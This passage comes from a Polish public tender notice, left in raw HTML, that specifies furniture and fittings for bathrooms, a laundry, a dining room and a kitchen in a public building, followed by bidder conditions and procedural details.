niekapekZbiornik wielokrotnego napełniania, można uzupełniać z kanistraSprężyna: stal hartowanaZamek i klucz: metal38.	Pojemnik na ręczniki papierowe 1 szt.Przeznaczenie: ręczniki papierowe ZZWielkość listka: do 250 x 230 mmPojemność: 400 sztukMateriał obudowy: tworzywo ABSWymiary min. : - wysokość: 270 mm, - szerokość: 270 mm, - głębokość: 130 mmSposób dozowania: wyciągnięcie jednej sztuki papieru powoduje wysunięcie się kolejnejZamek i klucz: plastikOkienko kontrolne informujące o ilości ręcznikówRodzaj montażu: naścienny, przykręcanyOpakowanie zawiera zestaw wkrętów z kołkamiPosiada atest PZH39.	Pojemnik na papier toaletowy 1 szt.Przeznaczenie: papier toaletowy w jumbo rolachWymiary roli: 180-220 mmTrzpień: 45 mm / 55 mmMateriał obudowy: plastik ABSKolor obudowy: szaryWykończenie: satynoweWymiary: - wysokość: 260 mm, - szerokość: 240 mm, - głębokość: 130 mmZamek i klucz: plastikRodzaj montażu: naścienny, przykręcanyWaga netto: 0,60 kgOpakowanie zawiera zestaw wkrętów z kołkami40.	Zestaw prysznicowy (drążek kątowy, kotara, siedzisko uchylne) 1 kompletDrążek kątowy 1 szt. - drążek o wym. min. 90 x 90 cm, malowany proszkowo, kolor biały, uchwyt sufitowy.Kotara 1 szt. - Zasłona prysznicowa zmywalna nie chłoniąca wody. Wym. min. 200 x 200 cm, Mocowanie standard pvc.Siedzisko składane 1 szt. - Dane techniczneMateriał	Stal węglowaWykończenie	Farba epoksydowa białaGrubość pokrycia epoksydowego	70uWymiary całkowite min. po rozłożeniu	"	wysokość 150 mm"	szerokość 440"	głębokość 460 mmŚrednica rury	? 32Grubość stali	1,5 mmRodzaj łączenia elementów stalowych	Spawanie TIGMaksymalne obciążenie	120 kgZabezpieczenia	Plastikowe osłony na wystające śrubyMocowanie	8-śrubowe, ścienneŚruby	8 śrub ze stali nierdzewnej z sześciokątną główką (8 mm x 70 mm)Kołki rozporowe	8 kołków nylonowych (10 mm x 50 mm)Waga siedziska	4,4 kgWaga kartonu 1 szt.	5,35 kg41.	Zestaw uchwytów dla potrzeb osób niepełnosprawnych - 1 kplUchwyt poziomy 1 szt. - uchwyt prosty dł. min. 30cm dla osób niepełnosprawnych, malowany proszkowo, kolor biały fi25, mocowany do ściany w 2 miejscach.Poręcz uchylna ścienna 1 szt.Materiał: stal węglowaWykończenie: farba epoksydowa białaKształt poręczy: łukowaDługość poręczy min.: 700 mmWymiary całkowite min.: 113 x 150 x 700 mmŚrednica rury min.: ? 32Grubość stal min.i: 1,5 mm (rura), 3-4 mm (wspornik) Rodzaj łączenia elementów stalowych: spawanie TIG Uchylanie w górę Zabezpieczenia: progresywny system hamulcowyMaksymalne obciążenie: 120 kgMocowanie: 6-śrubowe, ścienne42.	Podręczna półka wisząca 1 szt.Półka wisząca, metalowa, malowana proszkowo kolor biały.Wymiary min.:Szerokość:55cmWysokość (cm):25cmGłębokość (cm):25cmPom. 0.20 UMYWALNIA / PRASOWALNIA / PRALNIA / SUSZARNIA43.	Suszarka do wieszania ubrań, stojąca, składana - 1szt.całkowita powierzchnia suszenia min.: 22 m?materiał: stal powlekana żywicąWymiary min.wysokość: 110 cmszerokość: 56 cmdługość: 180 cmśrednica prętów: 6 mmszerokość złożonej suszarki: 5 cmkolor do ustalenia z inwestorem44.	Deska do prasowania 1 szt.Konstrukcja metalowa malowana proszkowo. Powierzchnia prasowania w obiciu materiałowym odpornym na wysokie temperatury.Długość: min. 125 cm,Szerokość: ok. 38 cm,Wysokość: ok. 85 cm.Pom. 0.21 POM. PORZĄDKOWE45.	Zestaw/wózek do sprzątania - 1 szt.Wózek do sprzątania dwuwiaderkowy min. 2x17 l z uchwytem na worek.wymiary wózka min.: wys.100,5 cm / szer. 40 cm / dł. 118,5 cmkonstrukcja ze stali chromowanejmetalowy uchwyt prowadzącyuchwyt na koszyk: stal chromowanauchwyt na worek o pojemności min. 120 l: stal chromowanadolny podest - uniemożliwia opadanie worka na podłogę,metalowe ramię prasyprasa do mopów, którą można w łatwy sposób demontować2 wiaderka poj. min 17 litrów z podziałkąwiaderka wykonane z tworzywa sztucznego odpornego na uszkodzeniaMin. 4 x osłony boczne - ochrona mebli i ścian4 x gumowe kółkaPom. 0.22 ŁAZIENKA MĘSKA46.	Lustro z regulowanym kątem położenia (przystosowane dla osób niepełnosprawnych) 1 szt.Lustro uchylne w pełnej ramie 60×60 cm dla osób niepełnosprawnych malowane proszkowo na kolor biały.47.	Dozownik do mydła zawieszany 2 szt.Pojemność: 0,5 litraWymiary min.: - wysokość: 150 mm, - szerokość: 100 mm, - głębokość: 100 mmSposób uruchamiania: przyciskWizjer do kontroli poziomu mydłaPrzeznaczenie: mydło w płynieRodzaj montażu: naścienny, przykręcanyW opakowaniu zestaw wkrętów z kołkamiJedna doza mydła: 1 mlZawór niekapekZbiornik wielokrotnego napełniania, można uzupełniać z kanistraSprężyna: stal hartowanaZamek i klucz: metal48.	Pojemnik na ręczniki papierowe 1 szt.Przeznaczenie: ręczniki papierowe ZZWielkość listka: do 250 x 230 mmPojemność: 400 sztukMateriał obudowy: tworzywo ABSWymiary min. : - wysokość: 270 mm, - szerokość: 270 mm, - głębokość: 130 mmSposób dozowania: wyciągnięcie jednej sztuki papieru powoduje wysunięcie się kolejnejZamek i klucz: plastikOkienko kontrolne informujące o ilości ręcznikówRodzaj montażu: naścienny, przykręcanyOpakowanie zawiera zestaw wkrętów z kołkamiPosiada atest PZH49.	Pojemnik na papier toaletowy 1 szt.Przeznaczenie: papier toaletowy w jumbo rolachWymiary roli: 180-220 mmTrzpień: 45 mm / 55 mmMateriał obudowy: plastik ABSKolor obudowy: szaryWykończenie: satynoweWymiary: - wysokość: 260 mm, - szerokość: 240 mm, - głębokość: 130 mmZamek i klucz: plastikRodzaj montażu: naścienny, przykręcanyWaga netto: 0,60 kgOpakowanie zawiera zestaw wkrętów z kołkami50.	Zestaw prysznicowy (drążek kątowy, kotara, siedzisko uchylne) 1 kompletDrążek kątowy 1 szt. - drążek o wym. min. 90 x 90 cm, malowany proszkowo, kolor biały, uchwyt sufitowy.Kotara 1 szt. - Zasłona prysznicowa zmywalna nie chłoniąca wody. Wym. min. 200 x 200 cm, Mocowanie standard pvc.Siedzisko składane 1 szt. - Dane techniczneMateriał	Stal węglowaWykończenie	Farba epoksydowa białaGrubość pokrycia epoksydowego	70uWymiary całkowite min. po rozłożeniu	"	wysokość 150 mm"	szerokość 440"	głębokość 460 mmŚrednica rury	? 32Grubość stali	1,5 mmRodzaj łączenia elementów stalowych	Spawanie TIGMaksymalne obciążenie	120 kgZabezpieczenia	Plastikowe osłony na wystające śrubyMocowanie	8-śrubowe, ścienneŚruby	8 śrub ze stali nierdzewnej z sześciokątną główką (8 mm x 70 mm)Kołki rozporowe	8 kołków nylonowych (10 mm x 50 mm)Waga siedziska	4,4 kgWaga kartonu 1 szt.	5,35 kg51.	Zestaw uchwytów dla potrzeb osób niepełnosprawnych - 1 kplUchwyt poziomy 1 szt. - uchwyt prosty dł. min. 30cm dla osób niepełnosprawnych, malowany proszkowo, kolor biały fi25, mocowany do ściany w 2 miejscach.Poręcz uchylna ścienna 1 szt.Materiał: stal węglowaWykończenie: farba epoksydowa białaKształt poręczy: łukowaDługość poręczy min.: 700 mmWymiary całkowite min.: 113 x 150 x 700 mmŚrednica rury min.: ? 32Grubość stal min.i: 1,5 mm (rura), 3-4 mm (wspornik) Rodzaj łączenia elementów stalowych: spawanie TIG Uchylanie w górę Zabezpieczenia: progresywny system hamulcowyMaksymalne obciążenie: 120 kgMocowanie: 6-śrubowe, ścienne52.	Podręczna półka wisząca 1 szt.Półka wisząca, metalowa, malowana proszkowo kolor biały.Wymiary min.:Szerokość:55cmWysokość (cm):25cmGłębokość (cm):25cmPom. 0.23 POMIESZCZENIE OGÓLNODOSTĘPNE/ JADALNIA53.	Stół - 4 szt.Stół wykonany z litego drewna sosnowego, z opaska pod blatem stołu. Wymiary stołu min.: 80 x 120 cm,Wysokość min.: 80 cm.Blat o gr. min. 25mm, nogi stołu gr. min. 60 x 60 mm.Przykładowa wizualizacja rys. nr 654.	Krzesła - 16 szt.Wymiary krzesła: 80 x 45,00 cm,Wysokość siedziska: 44 cm,Lekka, stabilna, trwała chromowana konstrukcja. Siedzisko i oparcie wykonane z trwałego plastiku. Kolor szary.55.	Regał 2 szt.Wymiary: 70 x 210 cm, gł. 40 cm, 5 półek.Szafa wykonane z płyty meblowej laminowanej o gr. 18 mm, krawędzie płyt zabezpieczone taśmą PCV.Wymiary oraz układ regału w rys. nr 10.Pom. 0.24 ZMYWALNIA56.	Stół ze zlewem 1-komorą i dolna półką 1 szt.Stół ze zlewem jednokomorowym z lewej strony i półka dolną wykonany ze stali nierdzewnej przeznaczony do samodzielnego montażu. W komorze zlewu znajduje się otwór odpływowy o średnicy min. 5,2 cm. Komora zlewu o wymiarach min. 40x40x25 cm. W blacie na wysokości środka komory zlewu zaślepiony otwór pod baterię o średnicy min. 3,3 cm. Standardowo stół wyposażony jest w rant tylni. Regulowane nóżki z tworzywa.Wymiary:Wysokość min.: 85 cmDługość min.: 100 cmSzerokość min.: 60 cmPrzykładowa wizualizacja na rys, nr 11.57.	Szafa przelotowa ze stali nierdzewnej z drzwiami suwanymi po obu stronach 1 szt.szafa wykonana z wysokiej jakości stali nierdzewnej,stopki h min. 5 cm, regulowane +/- 15 mm,dwoje drzwi przesuwnych,trzy półki nieprzestawne, łatwe do demontażuszerokość - 100cmgłębokość - 50 cmwysokość - 200 cmPom. 0.25 KUCHNIA58.	Szafki kuchenne o szer. 3,6m gł. 60cm wys. 85 cm z blatem kuchennym o wym. 4 x 65 cm. Wysokość szafek 85 cm, z blatem ca 88 cm.Szafki wykonany z płyty meblowej laminowanej o gr. min. 18 mm, krawędzie płyt zabezpieczone taśmą PCV. Półki 6 szt. gr. min. 25 mm. Kolor frontu, korpusu szafek, szuflad, obrzeży do ustalenia z inwestorem. 4 szafki o łącznej długości 3,80m (1 - 100 cm, 2 - 50 cm, 3 - 110 cm, 4 - 100 cm). W zestawie 2 szt. wkładu na sztućce. Tworzywo plastik, wym. min. Dł:49xSzer:33xWys:5 cm. Szadki na nóżkach.Wymiary oraz układ szafek w rys. nr 12.59.	Wyposażenie kuchni - pozostałe elementy - 1 kpl.Garnki ze stali nierdzewnej kolor srebrny. Patelnia wykonane z aluminium, pokrytego dwuwarstwową powłoką ceramiczną, kolor czarny˘	Garnek z pokrywką 16 cm, 1,5 l,˘	Garnek z pokrywką 20 cm, 2,5 l,˘	Garnek z pokrywką 24 cm, 2,5 l,˘	Garnek z pokrywką 24 cm, 4,0 l,˘	Garnek z pokrywką 24 cm, 5,5 l,˘	Patelnia z pokrywką 20 cm,˘	Patelnia z pokrywką 24 cm,˘	Patelnia z pokrywką 28 cm,˘	Patelnia z pokrywką 30 cm,˘	Zestaw talerzy, kubków, szklanek 40 szt.˘	Sztućce 40 kpl.Uwagi:Do ceny należy doliczyć transport oraz montaż mebli. Należy doliczyć montaż zlewozmywaka 2 komorowego w blacie mebli kuchennych.Wszystkie elementy wyposażenia powinny posiadać wymagane przepisami Atesty i dopuszczenia do użytkowania w budynku użyteczności publicznej.Montaż wyposażenia wg wytycznych producenta, zgodnie z obowiązującymi przepisami oraz z zachowaniem w szczególności bezpieczeństwa użytkowania.Wiążąca jest zgoda Zamawiającego na zmianę przez Wykonawcę proponowanych wymiarów poszczególnych pozycji opisu przedmiotu zamówienia. </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">39100000-3</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39200000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39300000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39700000-9</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2017-12-27</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie określa niniejszego warunku udziału w postępowaniu</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie określa niniejszego warunku udziału w postępowaniu</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące zdolności technicznej lub zawodowej. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.Zamawiający wymaga, aby Wykonawca posiadał wiedzę i doświadczenie, tj. w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 1 zadanie polegające na dostawie wraz z montażem mebli, o wartości nie mniejszej niż 30 000,00 zł brutto.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp.Oświadczenie wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne.Oświadczenie wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Wykaz dostaw lub usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów określających czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy lub usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy. W przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej składa informację z odpowiedniego rejestru albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument, w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy Pzp, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu.Zobowiązanie podmiotów, na zdolnościach lub sytuacji których Wykonawca polega, do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.Wzór oferty na dostawyWykaz części zamówienia, której wykonanie wykonawca zamierza powierzyć podwykonawcomOświadczenie o zatrudnianiu osób na podstawie umowy o pracę</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">1 657.20 zł</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow">0</span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow">0</span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie">Nie</span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow">Nie</span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow">Nie</span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span 